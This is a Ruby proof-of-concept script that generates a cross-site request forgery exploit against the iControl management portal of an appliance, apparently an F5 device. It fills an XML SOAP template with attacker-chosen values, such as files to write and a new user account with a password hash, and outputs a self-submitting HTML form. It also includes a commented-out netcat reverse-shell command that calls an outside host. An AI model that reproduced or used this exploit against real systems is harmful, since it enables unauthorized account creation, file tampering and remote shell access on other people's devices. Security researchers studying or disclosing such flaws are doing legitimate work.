README.md
Rendering markdown...
require 'httparty'
require 'base64'
def usage()
$stderr.puts "ruby #{ $0 } <target> <xml_template> [username:password]"
exit
end
TARGET = ARGV[0] || usage()
TARGET_URL = "https://#{ TARGET }/iControl/iControlPortal.cgi"
TEMPLATE_FILE = ARGV[1] || usage()
begin
TEMPLATE = File.read(TEMPLATE_FILE)
rescue StandardError => e
$stderr.puts "File not found: #{ TEMPLATE_FILE }"
$stderr.puts
usage()
end
ACCOUNT = ARGV[2]
if ACCOUNT
$stderr.puts "NOTE: You've provided a username and password, which means this is going"
$stderr.puts "to authenticate, and therefore isn't an exploit"
$stderr.puts
$stderr.puts "Don't enter a username:password if you want to generate a CSRF exploit!"
end
# Set up some defaults
DEFAULTS = {
'FILENAME' => '/tmp/csrfdemo.txt',
'BASE64FILEDATA' => 'SGVsbG8gd29ybGQh',
'USERNAME' => 'rontest',
'FULLNAME' => 'Ron Test',
'CRYPTSHA512HASH' => '$6$T2mT4PeYSuyg/hSr$y/rN9tol5t1fRxTBqFVtxLzRfUBXt16yNahqYTaVVZa3PITfoAKBnuzqvwBT77qNBV4JjgwdhzqmsMk78bo6d0', # "Password1"
'FROM_FILENAME' => '/tmp/file1',
'TO_FILENAME' => '/tmp/file2',
}
#COMMAND = "nc -e /bin/bash 10.0.0.146 4444 2>&1 > /dev/null &"
DELAY = 1000
# Fill in the template
REQUEST = TEMPLATE.gsub(/%%%[a-zA-Z0-9_]+%%%/) do |var|
var.gsub!(/%/, '')
$stderr.print "Value for #{ var } [#{ DEFAULTS[var] }]: "
$stderr.flush
val = $stdin.gets&.chomp
if !val || val.length == 0
val = DEFAULTS[var]
end
val
end
if ACCOUNT
$stderr.puts "Sending the following payload directly to #{ TARGET }..."
$stderr.puts
$stderr.puts REQUEST
response = HTTParty.post(
TARGET_URL,
verify: false,
headers: {
authorization: Base64::encode64(ACCOUNT),
'content-type': 'text/xml',
},
body: REQUEST
)
$stderr.puts
$stderr.puts "Response:"
$stderr.puts response
$stderr.puts
$stderr.puts '---'
if response.body =~ /(error_string.*)/
$stderr.puts "Something went wrong:"
$stderr.puts
$stderr.puts $1
exit 1
end
else
puts %{
<form id="form" method="post" action="#{ TARGET_URL }" enctype="text/plain">
<textarea id="payload" name="<!--">-->#{ REQUEST.gsub(/</, '<').gsub(/>/, '>') }</textarea>
<input type=submit>
</form>
<script>
setTimeout(function() {
document.getElementById("form").submit();
}, #{ DELAY });
</script>
}
end